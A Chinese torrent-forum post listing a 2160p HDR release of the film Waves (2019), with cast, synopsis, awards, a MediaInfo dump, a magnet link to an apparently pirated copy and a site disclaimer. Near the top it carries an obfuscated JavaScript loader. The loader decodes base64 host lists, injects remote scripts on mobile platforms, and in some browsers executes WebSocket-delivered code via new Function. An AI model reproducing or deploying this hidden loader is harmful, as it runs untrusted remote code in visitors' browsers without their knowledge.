浪潮[双语字幕].Waves.2019.2160p.HDR.UHD.BluRay.TrueHD.7.1.Atmos.x265-10bit 17.51GB

版主小s 28天前 159

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 浪潮
◎片  名 Waves
◎年  代 2019
◎产  地 美国 / 加拿大
◎类  别 剧情 / 爱情
◎语  言 英语
◎上映日期 2019-08-30(特柳赖德电影节) / 2019-11-15(美国)
◎IMDb链接 https://www.imdb.com/title/tt8652728/
◎豆瓣评分 6.8/10 (4880人评价)
◎豆瓣链接 https://movie.douban.com/subject/30263576/
◎片  长 135分钟
◎导  演 特里·爱德华·沙尔茨 Trey Edward Shults (id:1349647)
◎编  剧 特里·爱德华·沙尔茨 Trey Edward Shults (id:1349647)
◎演  员 小凯文·哈里森 Kelvin Harrison Jr. (id:1372966)
       卢卡斯·赫奇斯 Lucas Hedges (id:1340596)
       泰勒·拉塞尔 Taylor Russell (id:1377786)
       亚历克萨·德米 Alexa Demie (id:1383777)
       芮妮·戈兹贝里 Renee Goldsberry (id:1096089)
       斯特林·K·布朗 Sterling K. Brown (id:1325589)
       比尔·怀斯 Bill Wise (id:1362024)
       大卫·加雷利克 David Garelik (id:1397742)
       贾斯汀·陈 Justin R. Chan (id:1430649)
       约书亚·布罗克顿 Joshua Brockington (id:1430650)
       克利夏·费尔柴尔德 Krisha Fairchild (id:1362023)
       阿尔伯特·林克 Albert Link (id:1430651)
       小克利夫顿·克林斯 Clifton Collins Jr. (id:1019033)
       维维·皮内达 Vivi Pineda (id:1430652)
       霍兰德·海耶斯 Holland Hayes (id:1430653)
       鲁宾·A·布朗 Ruben E. A. Brown (id:1430654)
       丹尼斯·德沃 Dennis Deveaugh (id:1084363)
       哈莫尼·科林 Harmony Korine (id:1013996)
       尼尔·哈夫 Neal Huff (id:1340785)
       阿维斯·玛丽·巴尼斯 Avis-Marie Barnes (id:1363421)
       吉恩·麦克·丹尼尔斯 Gene Mack Daniels (id:1395802)
       莎伦·菲弗 Sharon Pfeiffer (id:1422784)
       特伦特·雷诺 Trent Reznor (id:1045152)
       阿提喀斯·罗斯 Atticus Ross (id:1307714)

◎标  签 美国 / 青春 / 爱情 / 2019 / 剧情 / 音乐 / 家庭 / 成长

◎简  介
  卢卡斯·赫奇斯、斯特尔林·K布朗、小凯文·哈里森(《泥土之界》《黑夜造访》)、泰勒·罗素(《忽然七日》《迷失太空》)加盟A24打造的音乐题材新片《浪潮》(Waves),特里·爱德华·沙尔茨(《黑夜造访》《克利夏》)自编自导,下月在佛罗里达州开拍。                                    
                                讲述两对年轻情侣在情感的雷区中成长和相爱的故事,被描述为“一部充满戏剧性的歌舞片,有着全新的视角,是一首充满活力、感人肺腑的当代青少年生活的颂歌”。影片几乎全程与音乐同步,将一些标志性的当代歌曲与奥斯卡得主Trent Reznor&Atticus Ross(《社交网络》《龙纹身的女孩》)的原创配乐结合在一起。

◎获奖情况 (共6项)
  第91届美国国家评论协会奖 (2019)
  年度佳片

  第35届美国独立精神奖 (2020)
  最佳女配角(提名)
   └──泰勒·拉塞尔 (id:1377786)

  第29届哥谭独立电影奖 (2019)
  最佳影片(提名)
  年度突破演员
   └──泰勒·拉塞尔 (id:1377786)

  第32届芝加哥影评人协会奖 (2019)
  最具潜力演员(提名)
   └──泰勒·拉塞尔 (id:1377786)

  第4届亚特兰大影评人协会奖 (2019)
  突破表演奖
   └──小凯文·哈里森 (id:1372966)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 299750614009348480328543459054134011177 (0xE181DE4B53D708E7C14BDE4DC7C0A529)

  4. Complete name                            : Wa[email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 17.5 GiB

  8. Duration                                 : 2 h 15 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 18.5 Mb/s

  11. Movie name                               : Waves 2019 2160p HDR UHD BluRay TrueHD 7.1 Atmos [email protected]

  12. Encoded date                             : UTC 2021-08-17 08:41:02

  13. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  14. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2


  15. Video

  16. ID                                       : 1

  17. Format                                   : HEVC

  18. Format/Info                              : High Efficiency Video Coding

  19. Format profile                           : Main [email protected]@High

  20. HDR format                               : SMPTE ST 2086, HDR10 compatible

  21. Codec ID                                 : V_MPEGH/ISO/HEVC

  22. Duration                                 : 2 h 15 min

  23. Bit rate                                 : 14.3 Mb/s

  24. Width                                    : 3 840 pixels

  25. Height                                   : 2 072 pixels

  26. Display aspect ratio                     : 1.85:1

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 23.976 (24000/1001/53354) FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 10 bits

  32. Bits/(Pixel*Frame)                       : 0.075

  33. Stream size                              : 13.6 GiB (78%)

  34. Title                                    : @HDSky

  35. Writing library                          : x265 - H.265/HEVC codec

  36. Default                                  : Yes

  37. Forced                                   : No

  38. Color range                              : Limited

  39. Color primaries                          : BT.2020

  40. Transfer characteristics                 : PQ

  41. Matrix coefficients                      : BT.2020 non-constant

  42. Mastering display color primaries        : Display P3

  43. Mastering display luminance              : min: 0.0020 cd/m2, max: 1000 cd/m2

  44. Maximum Content Light Level              : 739 cd/m2

  45. Maximum Frame-Average Light Level        : 331 cd/m2


  46. Audio

  47. ID                                       : 2

  48. Format                                   : MLP FBA 16-ch

  49. Format/Info                              : Meridian Lossless Packing FBA with 16-channel presentation

  50. Commercial name                          : Dolby TrueHD with Dolby Atmos

  51. Codec ID                                 : A_TRUEHD

  52. Duration                                 : 2 h 15 min

  53. Bit rate mode                            : Variable

  54. Bit rate                                 : 3 837 kb/s

  55. Maximum bit rate                         : 6 222 kb/s

  56. Channel(s)                               : 8 channels

  57. Channel layout                           : L R C LFE Ls Rs Lb Rb

  58. Sampling rate                            : 48.0 kHz

  59. Frame rate                               : 1 200.000 FPS (40 SPF)

  60. Compression mode                         : Lossless

  61. Stream size                              : 3.64 GiB (21%)

  62. Title                                    : English

  63. Language                                 : English

  64. Default                                  : Yes

  65. Forced                                   : No

  66. Number of dynamic objects                : 11

  67. Bed channel count                        : 1 channel

  68. Bed channel configuration                : LFE


  69. Text #1

  70. ID                                       : 3

  71. Format                                   : PGS

  72. Muxing mode                              : zlib

  73. Codec ID                                 : S_HDMV/PGS

  74. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration                                 : 2 h 13 min

  76. Bit rate                                 : 81.0 kb/s

  77. Count of elements                        : 6446

  78. Stream size                              : 77.5 MiB (0%)

  79. Title                                    : CHS

  80. Language                                 : Chinese

  81. Default                                  : Yes

  82. Forced                                   : No


  83. Text #2

  84. ID                                       : 4

  85. Format                                   : PGS

  86. Muxing mode                              : zlib

  87. Codec ID                                 : S_HDMV/PGS

  88. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  89. Duration                                 : 2 h 13 min

  90. Bit rate                                 : 82.6 kb/s

  91. Count of elements                        : 6446

  92. Stream size                              : 79.0 MiB (0%)

  93. Title                                    : CHT

  94. Language                                 : Chinese

  95. Default                                  : No

  96. Forced                                   : No


  97. Text #3

  98. ID                                       : 5

  99. Format                                   : PGS

  100. Muxing mode                              : zlib

  101. Codec ID                                 : S_HDMV/PGS

  102. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  103. Duration                                 : 2 h 13 min

  104. Bit rate                                 : 139 kb/s

  105. Count of elements                        : 6449

  106. Stream size                              : 133 MiB (1%)

  107. Title                                    : CHS&ENG

  108. Language                                 : Chinese

  109. Default                                  : No

  110. Forced                                   : No


  111. Text #4

  112. ID                                       : 6

  113. Format                                   : PGS

  114. Muxing mode                              : zlib

  115. Codec ID                                 : S_HDMV/PGS

  116. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration                                 : 2 h 13 min

  118. Bit rate                                 : 141 kb/s

  119. Count of elements                        : 6449

  120. Stream size                              : 135 MiB (1%)

  121. Title                                    : CHT&ENG

  122. Language                                 : Chinese

  123. Default                                  : No

  124. Forced                                   : No


  125. Menu

  126. 00:00:00.000                             : en:Chapter 01

  127. 00:07:21.900                             : en:Chapter 02

  128. 00:16:23.065                             : en:Chapter 03

  129. 00:22:37.106                             : en:Chapter 04

  130. 00:31:59.709                             : en:Chapter 05

  131. 00:39:46.301                             : en:Chapter 06

  132. 00:50:08.005                             : en:Chapter 07

  133. 01:00:24.955                             : en:Chapter 08

  134. 01:06:38.244                             : en:Chapter 09

  135. 01:13:05.673                             : en:Chapter 10

  136. 01:18:40.883                             : en:Chapter 11

  137. 01:32:56.112                             : en:Chapter 12

  138. 01:43:36.627                             : en:Chapter 13

  139. 01:54:17.309                             : en:Chapter 14

  140. 02:09:51.075                             : en:Chapter 15



TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:CF183B107D816A6EB328B3203D2F8B480BA13E14
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回